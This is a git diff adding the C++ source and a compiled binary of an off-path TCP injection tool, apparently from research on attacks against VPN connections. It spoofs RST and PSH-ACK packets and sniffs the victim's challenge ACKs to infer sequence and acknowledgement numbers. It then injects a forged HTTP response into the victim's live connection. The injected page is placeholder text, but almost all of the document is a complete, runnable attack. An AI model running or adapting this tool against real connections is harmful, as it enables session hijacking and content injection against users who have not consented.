victim_wlan_addr, dest_ip, remote_addr, interface; +int sport, dport, request_size, chack_count; + + +std::string dest_mac = ""; +std::string src_mac = ""; + + +void print_divider(int count) { + int i = 0; + while (i < count) { + cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + +// Injects a malicious payload with the exact seq +// and in-window ack inferred before +// +int inject_junk(long exact_seq, long in_win_ack) { + + PacketSender sender; + NetworkInterface iface(interface); + + std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n

Just some junk here..

"; + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(message); + TCP& tcp = pkt.rfind_pdu(); + + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.seq(exact_seq); + tcp.ack_seq(in_win_ack); + + print_divider(2); + cout << "attempting to inject garbage into the connection..\n"; + cout << "injected seq: " << exact_seq << ", in-win ack: " << in_win_ack << "\n"; + + sender.send(pkt, iface); + num_sent ++; + + return 1; + +} + + +// Send the same probe a number of times +// to see if the same amount of responses are +// triggered from the client +// +bool rechack(long seq, long ack, int num_checks) { + + PacketSender sender; + NetworkInterface iface(interface); + count_chacks = true; + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(""); + TCP& tcp = pkt.rfind_pdu(); + + if (ack == 0) { + tcp.set_flag(TCP::RST, 1); + } else { + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.ack_seq(ack); + } + + + tcp.seq(seq); + chack_count = 0; + int count = 0; + usleep(1000000 / 2); + + while (count < num_checks) { + sender.send(pkt, iface); + num_sent ++; + usleep(1000000 / 2 * 1.2); // must sleep half second due to chall-ack rate limit + count ++; + } + + usleep(1000000); + + // should have just sniffed as many chacks as we just sent + cout << "end of rechack, count was: " << chack_count << ", should be: " << num_checks << " \n"; + + if (chack_count >= num_checks) { + return true; + } + + count_chacks = false; + + return false; + +} + + +// Use the fact the client will respond to empty PSH-ACKs +// that have an in window ack AND a sequence number less than the exact +// next expected sequence, with chall-acks to infer exact sequence num +// +long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) { + + PacketSender sender; + NetworkInterface iface(interface); + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(""); + TCP& tcp = pkt.rfind_pdu(); + + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.ack_seq(in_win_ack); + + count_chacks = false; + track_nums = false; + + long min_seq = in_win_seq - 200; // assuming the in_window_seq is within 200 of the left edge of window + sniffed_chack = false; + long curr_seq = in_win_seq; + + // Continually decrement the in window sequence number + // until we sniff a chack which means we just passed the + // left edge of the sequence window + // + print_divider(1); + bool is_found = false; + + while (!is_found) { + + long j = curr_seq; + sniffed_chack = false; + + while (j > min_seq && !sniffed_chack) { + usleep(send_delay); + cout << "spoofing with seq: " << j << "\n"; + + tcp.seq(j); + sender.send(pkt, iface); + num_sent ++; + j -= 1; + } + + usleep(100000); + curr_seq = best_seq; + cout << "best seq at end of exact scan: " << curr_seq << "\n"; + + print_divider(1); + is_found = rechack(curr_seq, in_win_ack, 2); + if (show) cout << "exact seq was in win after rechack? " << is_found << "\n"; + + } + + return curr_seq; +} + + +// Use the fact the client will respond to empty PSH-ACKs +// that have an in window sequence number AND ack number less than the +// ack number in use with chall-acks to infer an in-window ack number +// +long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) { + + PacketSender sender; + NetworkInterface iface(interface); + + // Loop over ack space sending empty push-acks + // that use the in window sequence number found before + // + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(""); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.seq(in_win_seq); + + sniffed_chack = false; + chack_count = 0; + count_chacks = true; + track_nums = true; + + current_min_ack = min_ack; + long j = max_ack; + long current_ack = 0; + best_ack = 0; + + + while (j > min_ack && chack_count < chack_trigs) { + usleep(send_delay); + + tcp.ack_seq(j); + sender.send(pkt, iface); + num_sent ++; + + if (verbose && show) cout << "spoofing with ack: " << j << "\n"; + + if (j < 100000000) { // for tiny ack range + j -= block_size / 100; + + } else { + j -= block_size; + } + } + + usleep(100000); + + + for (int i = 0; i < possible_acks.size(); i ++) { + long cack = possible_acks[i]; + if (cack > current_ack) current_ack = cack; + + } + cout << "best ack at end of ack scan: " << current_ack << "\n"; + track_nums = false; + + return current_ack; +} + +// Finds the "quiet" portion of the ack range to +// start scanning and then begins to find an approx +// ack block close to the one being used +// +long quack_spread(long in_win_seq) { + + cout << "starting quack spread w seq: " << in_win_seq << "\n"; + + long start_ack_guess = 4294967294 / 2; + long end_ack_guess = 100; + + long block_size = 100000000; + sniffed_chack = false; // assume its gonna find an ack here first + + + // if the actual ack is less than half of the max_ack allowed, + // then it will consider acks at the very top end of the ack space (~429.....) + // to be less than that small ack. therefore, we check if the max ack + // triggers chacks right away, if so then we half the start_ack guess (~214....) + + + bool triggering = rechack(in_win_seq, start_ack_guess, 3); + + cout << "is ack in upper half? " << triggering << "\n"; + + if (triggering) { // then we know the ack is in the lower half of the ack space + start_ack_guess = start_ack_guess * 2; + } + + long j = start_ack_guess; + sniffed_chack = false; + print_divider(1); + + // Now continually decrement ack until we trigger another chack + // + + int send_delay = 75000; + bool is_found = false; + long current_ack = 0; + + while (!is_found) { + + current_ack = find_ack_block(start_ack_guess, 0, in_win_seq, block_size, send_delay, true, 1); + + cout << "finished quiet block spread, guessed quiet block ack: " << current_ack << "\n"; + print_divider(1); + + // recheck and send multiple to make sure we found correct ack block + is_found = rechack(in_win_seq, current_ack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + + if (!is_found) start_ack_guess = current_ack; + } + + + return current_ack; +} + +// Use the fact the client will respond to RSTs +// with an in-window sequence number with chall-acks to +// infer an in-window seq number +// +long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) { + + PacketSender sender; + NetworkInterface iface(interface); + + long max_seq = top_seq; + long adder = prev_block_size * delay_mult; + + cout << "starting round " << current_round << " spread at: " << (max_seq - adder) << "\n"; + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::RST, 1); + + long i; + + for (i = (max_seq - adder); i < max_seq; i += new_block_size) { + tcp.seq(i); + sender.send(pkt, iface); + num_sent ++; + usleep(send_delay); + } + + cout << "finished round " << current_round << " spread, guessed in window seq: " << best_seq << "\n"; + + return best_seq; + +} + + +// Attempt to sniff challenge acks while recording +// the last sequence or ack number we spoofed +// +bool handle_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); + + if (ack_search) { + // keep track of the last ack num we spoofed + if (ip.src_addr() == remote_addr) current_spoof_ack = some_pdu.rfind_pdu().ack_seq(); + + if (ip.src_addr() == victim_wlan_addr) { + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << payload << "\n"; + + if (payload == 115) { // each triggered chall-ack is 115 length SSL + if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n"; + if (count_chacks) chack_count += 1; + if (track_nums) possible_acks.push_back(current_spoof_ack); + if (current_spoof_ack > current_min_ack) best_ack = current_spoof_ack; + sniffed_chack = true; + } + } + + } else if (sniff_request == 1) { + // sniffing for a certain client request size (last step after finding seq and ack) + if (ip.src_addr() == victim_wlan_addr) { + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + cout << "sniffed cli request of size " << payload << "\n"; + if (payload == request_size) { + sniff_request = 2; + } + } + + } else { // sniffing for chack during sequence search + + // keep track of the last sequence num we spoofed + if (ip.src_addr() == remote_addr) current_spoof_seq = some_pdu.rfind_pdu().seq(); + + if (ip.src_addr() == victim_wlan_addr) { + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << payload << "\n"; + + if (payload == 115) { // each triggered chall-ack is 1 length15 SSL + + if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n"; + + if (track_nums) { + best_seq = current_spoof_seq; + possible_seqs.push_back(current_spoof_seq); + } else if (count_chacks) { // + chack_count += 1; + best_seq = current_spoof_seq; + } else { + if (!sniffed_chack) { + + if (best_seq == 0) { // still in initial seq spread + best_seq = current_spoof_seq; + sniffed_chack = true; + } else { + // make sure new seq is less than the previous sniffed one + if (current_spoof_seq < best_seq) { + best_seq = current_spoof_seq; + sniffed_chack = true; + } + } + + } + } + + } + + } + } + + return true; +} + + + +void sniff_stuff() { + SnifferConfiguration config; + config.set_promisc_mode(true); + Sniffer sniffer(interface, config); + sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack +} + + +// Try to find an in window sequence number using +// one of the very rough estimates found in the first +// sequence spread +long try_seq_block(long current_seq) { + + // Just did round 1 spoofing fast to get rough estimate of + // in window sequence number, now we send a round 2 and 3 spreads + // using the approximated seq with lower send rates + + current_round = 2; + sniffed_chack = false; + int wait_count = 0; + best_seq = current_seq; + usleep(1000000 / 2); + + // this will take into account the last block size of 50k, + // skip in blocks of 1055 seq nums per send, assume the last + // rounds delay was 80 packets for a response, and send every 150 msecs + long s1 = find_seq_block(50000, 1055, 80, 150, current_seq); + + while (best_seq == current_seq) { + usleep(500000); + if (show) cout << "waiting on round 2 chack..\n"; // return -1 if waiting too long + wait_count +=1; + if (wait_count > 5) return -1; + } + + // Now we should have a close estimate to an in-window seq + // so next do a third scan at much slower rate to ensure its + // an in-window sequence num + print_divider(1); + usleep(1000000 / 2); + + sniffed_chack = false; + current_round += 1; + current_seq = best_seq; + wait_count = 0; + + long s2 = find_seq_block(1055, 20, 50, 600, current_seq); + + while (best_seq == current_seq) { + usleep(500000); + if (show) cout << "waiting on round 3 chack..\n"; + wait_count +=1; + if (wait_count > 5) return -1; + } + + return best_seq; + +} + +// Gets rough estimate of sequence number in use +// by spreading entire sequence range quickly then +// tries to find in win sequence using each +// +long find_in_win_seq() { + + PacketSender sender; + NetworkInterface iface(interface); + + long start_seq_guess = 1; + long max_seq_num = 4294967295; + track_nums = true; // phase 1 is so fast it sniffs false seq nums so we try each + + cout << "spreading the connections entire sequence number range...\n"; + usleep(1000000 / 2); + + IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::RST, 1); + + long i; + + for (i = start_seq_guess; i < max_seq_num; i += 50000) { // sends to the whole sequence num space + tcp.seq(i); + sender.send(pkt, iface); + num_sent ++; + usleep(10); + } + usleep(1000000); + cout << "finished round 1 spread, guessed in window seq: " << best_seq << "\n"; + + track_nums = false; + int j = 0; + long in_win_seq = -1; + + while (j < possible_seqs.size() && in_win_seq == -1) { // try each possible seq block + print_divider(1); + current_round = 0; + if (show) cout << "trying to find in window seq around " << possible_seqs[j] << "\n"; + in_win_seq = try_seq_block(possible_seqs[j]); + j ++; + if (show) cout << "in win seq after try? " << in_win_seq << "\n"; + usleep(1000000 / 2); + } + + + possible_seqs.clear(); + track_nums = false; + + print_divider(1); + usleep(1000000 / 2); + + return best_seq; + +} + + +// Send two spoof rounds while increasing the send delay and +// decreasing block size to quickly get in-win ack estimate +// +long find_in_win_ack(long in_win_seq) { + + // quack should be below current ack in use but we only rechack once first round + ack_search = true; + long quack = quack_spread(in_win_seq); + + // Spoof empty PSH-ACKs starting at 'quack' plus some send delay + // until we sniff a chack and know we just went below the left + // edge of the ack window + usleep(1000000); + print_divider(1); + possible_acks.clear(); + + long block_size = 10000; + int send_delay = 500; + long max_ack = quack + (1 * 100000000); + long min_ack = quack; + long clack; + + bool is_found = false; + + while (!is_found) { // retry ack scan until we find block triggering chacks + + cout << "starting round 1 ack scan w min: " << min_ack << " and max: " << max_ack << "\n"; + clack = find_ack_block(max_ack, min_ack, in_win_seq, block_size, send_delay, false, 2); + + is_found = rechack(in_win_seq, clack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + int i = 0; + + while (!is_found && i < possible_acks.size()) { + long some_ack = possible_acks[i]; + if (show) cout << "finished ack scan 1 w possible in window ack: " << some_ack << "\n"; + print_divider(1); + + is_found = rechack(in_win_seq, some_ack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + i ++; + if (is_found) clack = some_ack; + + } + max_ack = clack; + } + + possible_acks.clear(); + usleep(1000); + + + // clack should be an in window ack so now we have both in window + // sequence and in window ack numbers. + // + ack_search = false; + track_nums = false; + + // clack has been consistently within 40k of next ack while testing but + // in practical use it needs to be less than the expected ack by at most + // 20k to be accepted as a valid ack, so here we add 30k to counter our delay + // but we could add a third ack scan to make it more accurate + // + long in_win_ack = clack + 30000; + return in_win_ack; +} + + +// After we've found exact seq and in-win ack, attacker waits +// for a specific request size to inject the response into +// +int wait_for_request(long exact_seq, long in_win_ack) { + sniff_request = 1; + int res = 0; + + while (sniff_request != 2) { + usleep(500000); + if (show) cout << "waiting for request of size..\n"; + } + + if(show) cout << "Sniffed request packet to respond to\n"; + + res = inject_junk(exact_seq, in_win_ack); + + return res; +} + +// Attempt to infer the exact sequence number +// and in-window ack in use by the connection +// +int phase_three_spread() { + + bool is_found = false; + long in_win_seq = 0; + + // Loop until we find in window seq + while (!is_found) { + in_win_seq = find_in_win_seq(); + print_divider(1); + + is_found = rechack(in_win_seq, 0, 2); + cout << "approx seq: " << in_win_seq << " was in win after rechack? " << is_found << "\n"; + if (!is_found) usleep(1000000 / 2); + } + + // At this point we should have an in-window sequence number and + // next step is to find an in-window ack number for the connection + // + usleep(1000000 / 2); + + long in_win_ack = find_in_win_ack(in_win_seq); + + cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n"; + + long exact_seq = find_exact_seq(in_win_seq - 100, in_win_ack, 100000) + 1; // should be one less than left edge + cout << "final exact seq guess: " << exact_seq << "\n"; + cout << "total number of packets sent: " << num_sent << "\n"; + print_divider(2); + + int res = 0; + + if (testing) { // for netcat + res = inject_junk(exact_seq, in_win_ack); + } else { // for normal http injection + cout << "waiting for client to request any page within inferred connection..."; + res = wait_for_request(exact_seq, in_win_ack); + } + + return res; + +} + + +int main(int argc, char** argv) { + + if (argc != 8) { + cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, vpn_ip, dport, request_size, iface)\n"; + return 0; + } + + remote_addr = argv[1]; + sport = atoi(argv[2]); + victim_wlan_addr = argv[3]; + dest_ip = argv[4]; + //dest_mac = argv[5]; + dport = atoi(argv[5]); + request_size = atoi(argv[6]); + interface = argv[7]; + thread sniff_thread(sniff_stuff); + print_divider(2); + + int r = phase_three_spread(); + + sniff_thread.detach(); + + return 0; +} diff --git a/server-side-attack/tcp-sside/inject/send_p3 b/server-side-attack/tcp-sside/inject/send_p3 new file mode 100755 index 0000000000000000000000000000000000000000..f8cb98204c804b4a0abf24a4997533b9892825d3 GIT binary patch literal 61624 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 